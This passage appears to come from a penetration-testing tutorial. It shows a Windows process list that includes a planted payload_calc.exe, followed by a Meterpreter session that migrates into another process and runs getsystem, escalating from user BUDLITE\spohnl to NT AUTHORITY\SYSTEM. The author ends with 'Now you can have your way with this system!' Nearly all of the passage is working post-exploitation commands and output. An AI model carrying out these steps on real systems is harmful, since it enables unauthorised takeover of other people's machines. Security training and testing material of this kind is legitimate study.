 1736  VMwareUser.exe       x86   0        BUDLITE\spohnl       C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1892  inetinfo.exe         x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1940  sqlservr.exe         x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
 224   snmp.exe             x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\snmp.exe
 244   sqlbrowser.exe       x86   0        NT AUTHORITY\SYSTEM  c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
 336   vmtoolsd.exe         x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 376   VMUpgradeHelper.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 2148  alg.exe              x86   0                             C:\WINDOWS\System32\alg.exe
 3364  wuauclt.exe          x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\wuauclt.exe
 3372  cmd.exe              x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\cmd.exe
 2508  svchost.exe          x86   0        NT AUTHORITY\SYSTEM  C:\WINDOWS\System32\svchost.exe
 3700  payload_calc.exe     x86   0        BUDLITE\spohnl       C:\WINDOWS\system32\payload_calc.exe

meterpreter > migrate 1436
[*] Migrating to 1436...
[*] Migration completed successfully.
meterpreter > getuid
Server username: BUDLITE\spohnl
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

That’s all there is to it.  Now you can have your way with this system!
